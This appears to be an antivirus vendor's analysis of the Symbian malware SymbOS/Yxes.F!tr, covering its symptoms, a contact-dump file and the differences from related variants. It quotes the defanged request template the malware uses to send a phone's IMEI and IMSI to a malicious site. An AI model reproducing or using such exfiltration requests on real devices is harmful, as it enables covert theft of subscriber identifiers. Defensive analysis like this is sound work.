SymbOS/Yxes.F!tr

Release DateJul 16, 2009
Detection Availability
Active DatabaseExtended Database
FortiGatelowhigh
FortiClient
FortiMailN/A
Current Antivirus Definition Database Version: 12.202
Description

Visible Symptoms

  • abnormally high bill
  • or presence of c:\system\data\pbk.info

Detailed Analysis

SymbOS/Yxes.F!tr is a variant of the SymbOS/Yxes.E!worm worm. It gathers information on contacts on the mobile phone and attempts to post information such as IMEI, and IMSI to malicious web sites.

This malware is part of the SymbOS/Yxes family, and is typically downloaded from malicious websites other variants of SymbOS/Yxes silently contact.
As for other variants of SymbOS/Yxes, the malware installs without any problem on Symbian OS 9 (or greater) phones. It uses a valid X.509 certificate, issued by Symbian.
The malware creates a semaphore (named PbkPatchSemaphore_0x20026CAB) to make sure a single instance is running.
Then, it dumps all contacts stored in the phone in a file named c:\system\data\pbk.info. For example:
00000000  42 45 47 49 4e 3a 56 43  41 52 44 0d 0a 56 45 52  |BEGIN:VCARD..VER|
00000010  53 49 4f 4e 3a 32 2e 31  0d 0a 52 45 56 3a 32 30  |SION:2.1..REV:20|
00000020  30 39 30 37 31 33 54 30  38 33 33 30 39 5a 0d 0a  |090713T083309Z..|
00000030  4e 3a 4e 6f 20 64 61 74  61 3b 41 76 20 6c 61 62  |N:No data;Av lab|
00000040  3b 3b 3b 0d 0a 54 45 4c  3b 43 45 4c 4c 3a 30 36  |;;;..TEL;CELL:06|
00000050  xx xx xx xx xx xx xx xx  0d 0a 58 2d 43 4c 41 53  |--------..X-CLAS|
00000060  53 3a 70 72 69 76 61 74  65 0d 0a 45 4e 44 3a 56  |S:private..END:V|
00000070  43 41 52 44 0d 0a                                 |CARD..|

Like other variants of SymbOS/Yxes, this malware attempts to issue an HTTP request to a malicious website, with the phone's IMEI and IMSI as URL parameters:
hxxp://[REMOVED]/PbkInfo.jsp?PhoneType=phonetype&PhoneImei=IMEI&PhoneImsi=IMSI

In this URL, the phone type is a string that corresponds to the phone's model, for example nokiaN95. The IMEI is a sequence of numbers corresponding to the victim's IMEI. The IMSI is another sequence of numbers corresponding to the victim's subscriber information.

Depending on phone's model, settings and sample, there are cases where the HTTP request fails to be sent and crashes the malware. In that case, no external communication is made.

There are three major differences with other Yxes variants:
  1. this version does not send any SMS. It only attempts to make HTTP connections
  2. this version does not read the SMS inbox folder.
  3. this version does not write nor propagate a malicious sisx file

Description Last Updated Date: Aug 28, 2009
Reference: ID - 940685